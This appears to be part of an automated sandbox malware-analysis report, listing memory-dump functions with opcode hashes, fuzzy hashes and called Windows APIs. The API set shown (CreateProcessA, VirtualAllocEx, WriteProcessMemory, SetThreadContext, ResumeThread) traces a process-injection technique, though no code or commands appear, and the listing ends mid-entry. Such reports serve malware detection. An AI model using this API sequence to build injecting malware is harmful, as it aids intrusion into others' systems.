                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: Pk
                      • API String ID: 0-1130133409
                      • Opcode ID: d91c29fa36bec77f65acfe69443bccd2b757c87e56152df82ec7f1b41edcd986
                      • Instruction ID: 28be420d1a0375fb238963b1f0f544a2a9912fe9ecad9c61f9b13983ac1a5768
                      • Opcode Fuzzy Hash: d91c29fa36bec77f65acfe69443bccd2b757c87e56152df82ec7f1b41edcd986
                      • Instruction Fuzzy Hash: 2C5159B2E152189BCB08CFA5D9415DDFBF6FBCD240F14A92AD405B7314DB7899018B2A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: (~pg
                      • API String ID: 0-3863253146
                      • Opcode ID: e0dde1efd892e5b0938ef08b6cfe0034da327bb023405c1d820431f096fb8d40
                      • Instruction ID: 866553344994eca33adcd326f670a1222269a421824384b11873a0eee0fa9538
                      • Opcode Fuzzy Hash: e0dde1efd892e5b0938ef08b6cfe0034da327bb023405c1d820431f096fb8d40
                      • Instruction Fuzzy Hash: 6721CCB6E056189BEB58CF6BDC4079EFBF7AFC8200F04C57AD508A6264EB3419458F51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79c56258265ec40ba18ec4469dd31b9adece2a523fbf3163e0c414da1b1ef957
                      • Instruction ID: 0b6701f14dfd43381fbe7fb8cf1b56812ceeed83a06e440b5e686db978ed32dd
                      • Opcode Fuzzy Hash: 79c56258265ec40ba18ec4469dd31b9adece2a523fbf3163e0c414da1b1ef957
                      • Instruction Fuzzy Hash: 0FE1BE75A046298FDB14CF79D881AADB7F3BF88304F11C569E406EBB59DB34A9018F81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7e6f27cfe8caf6fdb2d668821da49227edd822ff2044ceae0dd9c818bd9c4476
                      • Instruction ID: 233472f79b2eabb250e9c14191094e3c3cda87d876d074943151681e0c5e78e7
                      • Opcode Fuzzy Hash: 7e6f27cfe8caf6fdb2d668821da49227edd822ff2044ceae0dd9c818bd9c4476
                      • Instruction Fuzzy Hash: 0CC1AEB2B016048FEB19EB75C460BAEB7F7AF89300F14846DD556DB690CB39E901CB52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8ae0efa0bbedecc55458beeea2d58d0519d09273c73021f96b6d91fc947031f6
                      • Instruction ID: ab3bb285bfa3bbc32a2a316f1971a83d213eab07e0e32b7bc77b0811e4d09d31
                      • Opcode Fuzzy Hash: 8ae0efa0bbedecc55458beeea2d58d0519d09273c73021f96b6d91fc947031f6
                      • Instruction Fuzzy Hash: 789119B2E04229CFDB24CF65C8447E9BBB6BB89300F14C5EAD409A7254EB745A85CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b914f42ca6f1084fb6d8cc386834bc4273cf7039f356a5c0b0ddbead4628b610
                      • Instruction ID: 224fb8401970d69a8ea493c6aac7a8428057696f2b0a98014a4a5d854f03ef3b
                      • Opcode Fuzzy Hash: b914f42ca6f1084fb6d8cc386834bc4273cf7039f356a5c0b0ddbead4628b610
                      • Instruction Fuzzy Hash: B97106B8D4010E9FDF54CFA9D985AAEBBF1FF48300F10A659D412EB290DB31AA458F11
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ab5bc9ddc6925e621e91a4781b0c9138bd42603a31a5d85cf3c50100bce8775
                      • Instruction ID: 6072a635ccf8c97ceb3de6083cec87322ca9288d0e19edbba0202756f3faa9b2
                      • Opcode Fuzzy Hash: 3ab5bc9ddc6925e621e91a4781b0c9138bd42603a31a5d85cf3c50100bce8775
                      • Instruction Fuzzy Hash: 41715BB6D1920CDFCB14CFA5D4809ADFFB6FB89310F24A42AD406A7258D7389942CF16
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d7f039d75c7c44db062aaabecf9c52ea194145fbc61210638385eb993f8701a
                      • Instruction ID: 9602d34d1f76580a258b9665e32e7e18235d3cb7f13819421041c421541591ae
                      • Opcode Fuzzy Hash: 1d7f039d75c7c44db062aaabecf9c52ea194145fbc61210638385eb993f8701a
                      • Instruction Fuzzy Hash: 38615C36F101259FD714DB69DC90BAEB3E3AFC8614F1AC1A4E4199BB65DB34ED018B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32b0d2ae22f57f3cbaf69f203a67d4030369e301eecc6c28065f30c45f1c3751
                      • Instruction ID: 2a50742a56be25bc762c3b350e8a4217cbbde8cd1f5fd80c835373b46e2a50c5
                      • Opcode Fuzzy Hash: 32b0d2ae22f57f3cbaf69f203a67d4030369e301eecc6c28065f30c45f1c3751
                      • Instruction Fuzzy Hash: 5D8119B2D10229CFDB24CF66C844BEDB7B2BF89300F14C5AAD409A7254EB745A85CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e11f0da194dce4c5528902868b6afc6b3169710069ac3ca52d799f2e829fa124
                      • Instruction ID: bd7c92162d410e63f2c909ed6270232be680820b9141e7fb44cefffd789f3f9c
                      • Opcode Fuzzy Hash: e11f0da194dce4c5528902868b6afc6b3169710069ac3ca52d799f2e829fa124
                      • Instruction Fuzzy Hash: AD71F8B5E10218DFCB04DFE5D9856AEBBB6FF89300F10942AE815AB358EB345906CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50256b45220ea2161783183690ae09d6b90094d4556fc7e661580c90e0fdc24f
                      • Instruction ID: 12e4fec5867d3c42d663f440ddfcd65f94542ca73ee5e3243ce200243e86f337
                      • Opcode Fuzzy Hash: 50256b45220ea2161783183690ae09d6b90094d4556fc7e661580c90e0fdc24f
                      • Instruction Fuzzy Hash: 128107B5E11218DFCB04DFE5D9856AEBBB2FF89300F10942AE816AB358DB345906CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1e76b573301fdc8daaa1ac21d69c8bba7c37ae20886151ac07e0e21e5646c66
                      • Instruction ID: 7744f2e6f99c6c6f1b63123e05f64b1d452f11e89fb961cc2422eee28f482e0c
                      • Opcode Fuzzy Hash: b1e76b573301fdc8daaa1ac21d69c8bba7c37ae20886151ac07e0e21e5646c66
                      • Instruction Fuzzy Hash: 5A711776A10229DFDB24CF65C844BEDBBB2FB89300F1085EAD50AA7250E7749AC5CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 692dfafb6d895a10f7b0e6aa5aa59ed0dfc1f5deeecbba31bc5cefd1fafd8108
                      • Instruction ID: ce1ee14fe6e0b9fc7fb8a24f41da3fc89ca3e138628fac945630512dad1a41a9
                      • Opcode Fuzzy Hash: 692dfafb6d895a10f7b0e6aa5aa59ed0dfc1f5deeecbba31bc5cefd1fafd8108
                      • Instruction Fuzzy Hash: A1713776A10229DFDB24CF65C844BEDBBB2FB89300F1085EAD50AA7250E7749AC5CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bbf7cd16274e824c2a9079ece101933d98bd0533dbc064c1c3fa14d3186cc36a
                      • Instruction ID: 37922baab9d99d26e8deb67ef2e05803b945d8cee519c3bbc570bc8201aa783e
                      • Opcode Fuzzy Hash: bbf7cd16274e824c2a9079ece101933d98bd0533dbc064c1c3fa14d3186cc36a
                      • Instruction Fuzzy Hash: 995109B9D0011E9FDF44CFA9D985AAEBBF2BF88300F10A569D411EB254DB30AA458F51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1cee2b7bbec3b2e8640319165810db7f42aad54528cf804d54e009b7a05ffb3e
                      • Instruction ID: 723d5e9a0c7bfef34eb36f7adf568c13e8cd079aedbc8eb37d38650d815aee8d
                      • Opcode Fuzzy Hash: 1cee2b7bbec3b2e8640319165810db7f42aad54528cf804d54e009b7a05ffb3e
                      • Instruction Fuzzy Hash: 272137B6E192199ADB00CEA9D814AFEBBF6BB4A250F005026F405F3240EB388944CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9370021d7166c53dfda6be4c5afdf80e590c040b35e69a44d2feadd7d388f330
                      • Instruction ID: 4c69d1f2e40c50dd0ce8e6b2fea9411eda3813e62776e6160247c7dfb3c861eb
                      • Opcode Fuzzy Hash: 9370021d7166c53dfda6be4c5afdf80e590c040b35e69a44d2feadd7d388f330
                      • Instruction Fuzzy Hash: 19214AB6D252199BDB10CFA4D854BEEBBF6BB09241F155425F401F3280DB38C944CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05FA6D5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: dc996feee1d8751d48f4a2b4ed526a0b5d8ea5d43f679a1885738ccfeb43de50
                      • Instruction ID: 49140c3cc4e11b6a4d7104c9aa974f0ce57ab43f6985375a6336129bd5b9690c
                      • Opcode Fuzzy Hash: dc996feee1d8751d48f4a2b4ed526a0b5d8ea5d43f679a1885738ccfeb43de50
                      • Instruction Fuzzy Hash: 37A15D72D04259CFDB24DFA4C8857EDBBB2FB48304F088569D859E7240D7789985CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05FA6D5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: a1ec6f07f80d695db7b54fd2dcdb74c0f9968d3d9510ef94bf262500c6307b4c
                      • Instruction ID: 2a0da5679b4121ad05463cfd004e90becb7e73f69afb0ab5d138e2ac4de797ff
                      • Opcode Fuzzy Hash: a1ec6f07f80d695db7b54fd2dcdb74c0f9968d3d9510ef94bf262500c6307b4c
                      • Instruction Fuzzy Hash: 66915C72D04259CFDB20DFA4C885BEEBBB2FB48304F088569D815E7240D7789985CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B7BD2E
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 49c206b23d3e48480724f83e27ef1ab0eced6b19e7ac78a862753ddf46fbdd13
                      • Instruction ID: 33221170642bc1eaade832ae0940d5413011c6e43b23f417677cf5e911aa4c7c
                      • Opcode Fuzzy Hash: 49c206b23d3e48480724f83e27ef1ab0eced6b19e7ac78a862753ddf46fbdd13
                      • Instruction Fuzzy Hash: 887134B1A00B058FD724DF69D54179AB7F1FF88308F008A6AD49ADBB40DB34E9458F91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,?,00000001,00000000), ref: 0534568B
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: CreateFileMapping
                      • String ID:
                      • API String ID: 524692379-0
                      • Opcode ID: fdaa25acdfd8a73bcb6c0cfab6cfd8c67adb1e8630409fce39673226c6da2cc3
                      • Instruction ID: 2b595aaee72eef8a9beed88ae44644bcd538ebf337fd0d3317ffcc9f30a17b3c
                      • Opcode Fuzzy Hash: fdaa25acdfd8a73bcb6c0cfab6cfd8c67adb1e8630409fce39673226c6da2cc3
                      • Instruction Fuzzy Hash: A05105B1D043489FDB14CFA9C888B9EBBF2BF49714F258129E419BB250D7B5A844CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,?,00000001,00000000), ref: 0534568B
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: CreateFileMapping
                      • String ID:
                      • API String ID: 524692379-0
                      • Opcode ID: a0aa0a7a9e9088ae18e8ecb274772bb5715135ae0e8a868af43f088a88fee004
                      • Instruction ID: e2ce242331dd7e7e109954ccd9fb85f7ab7a11f40324c2a25c20a4bd951be8e6
                      • Opcode Fuzzy Hash: a0aa0a7a9e9088ae18e8ecb274772bb5715135ae0e8a868af43f088a88fee004
                      • Instruction Fuzzy Hash: 615103B1D043489FDB14CFA9C888B9EBBF2BF49714F25812AE419BB251D7B5A844CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B7DCAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 9e120cde94ef48360d5d87434140471095b66fa2ea9c3fa84262ff9e88468f80
                      • Instruction ID: eb618ea94b6a1ae85ab19927a8099922da2753f60addcd4ef56e70d916eb1881
                      • Opcode Fuzzy Hash: 9e120cde94ef48360d5d87434140471095b66fa2ea9c3fa84262ff9e88468f80
                      • Instruction Fuzzy Hash: 5551E0B1D00309DFDB14CFA9C884ADEBBB5FF88354F24816AE819AB250D7759845CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B7DCAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: f22c7d6b3602d5b3e67a285306d522ce907b1c6baa65ffdfdbb8ee604df5a7df
                      • Instruction ID: 30149616414d237f30a17bb199e6b11a410d2700134fe5bd49ecc7baa782668c
                      • Opcode Fuzzy Hash: f22c7d6b3602d5b3e67a285306d522ce907b1c6baa65ffdfdbb8ee604df5a7df
                      • Instruction Fuzzy Hash: 1B51EFB1D00309DFDB14CFAAD884ADEBBB5FF88314F24812AE819AB250D7709845CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 05346321
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: ab295b54aff7212a5bb5c962c990db498b26f152eea5423d330e599a119a84d3
                      • Instruction ID: a8c085c2435d04e97ef7cade25949557bf9514869c2098d369a576774ff28c3d
                      • Opcode Fuzzy Hash: ab295b54aff7212a5bb5c962c990db498b26f152eea5423d330e599a119a84d3
                      • Instruction Fuzzy Hash: 2C4123B1C04258CFDB24CFA9C9857CDBBF1BF49304F20806AD518AB251D7B46949CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 05346321
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 58d9665afb9c214be457b63841d0ed46e0a0df4d4c7cf39aac5d96e0a64170bd
                      • Instruction ID: d299a54610683e4f60a30cd037c6732bcf346ca37d175e856f3ac267efe96319
                      • Opcode Fuzzy Hash: 58d9665afb9c214be457b63841d0ed46e0a0df4d4c7cf39aac5d96e0a64170bd
                      • Instruction Fuzzy Hash: F04102B0C0465CCBDB24DFA9C984BDEBBF5BF49304F108069D519AB250D7B5694ACF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05340D91
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: a3fd3b6813309d35606084874cc031cb1b8556381c47cbb269b343d4351d3556
                      • Instruction ID: 8d89dcc2bb8b472cc6c03ac8399da3e4b975556548c542b9cd0642b26f528d8c
                      • Opcode Fuzzy Hash: a3fd3b6813309d35606084874cc031cb1b8556381c47cbb269b343d4351d3556
                      • Instruction Fuzzy Hash: C4410AB9A00209CFDB14CF99C488AAABBF5FF89314F14C559D519AB321D375A845CFA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05FA6930
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05FA6930
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B76D5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetThreadContext.KERNEL32(?,00000000), ref: 05FA6786
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ContextThread
                      • String ID:
                      • API String ID: 1591575202-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05FA6A10
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B76D5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetThreadContext.KERNEL32(?,00000000), ref: 05FA6786
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ContextThread
                      • String ID:
                      • API String ID: 1591575202-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05FA6A10
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • MapViewOfFile.KERNEL32(?,?,?,00000001,00000004), ref: 053458B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: FileView
                      • String ID:
                      • API String ID: 3314676101-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • MapViewOfFile.KERNEL32(?,?,?,00000001,00000004), ref: 053458B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: FileView
                      • String ID:
                      • API String ID: 3314676101-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B7BDA9,00000800,00000000,00000000), ref: 02B7BFBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05FA684E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B7BDA9,00000800,00000000,00000000), ref: 02B7BFBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05FA684E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B7BD2E
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetWindowLongW.USER32(?,?,?), ref: 02B7DE3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetWindowLongW.USER32(?,?,?), ref: 02B7DE3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • PostMessageW.USER32(?,?,?,?), ref: 05FAC2ED
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • PostMessageW.USER32(?,?,?,?), ref: 05FAC2ED
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Memory Dump Source
                      • Source File: 00000000.00000002.648223462.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                      • Associated: 00000000.00000002.648217225.00000000008F0000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: LvH$u"G
                      • API String ID: 0-2980657590
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: LvH$u"G
                      • API String ID: 0-2980657590
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: /BS$/BS
                      • API String ID: 0-4161354524
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: rdO2
                      • API String ID: 0-278582973
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: /BS
                      • API String ID: 0-3363854334
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
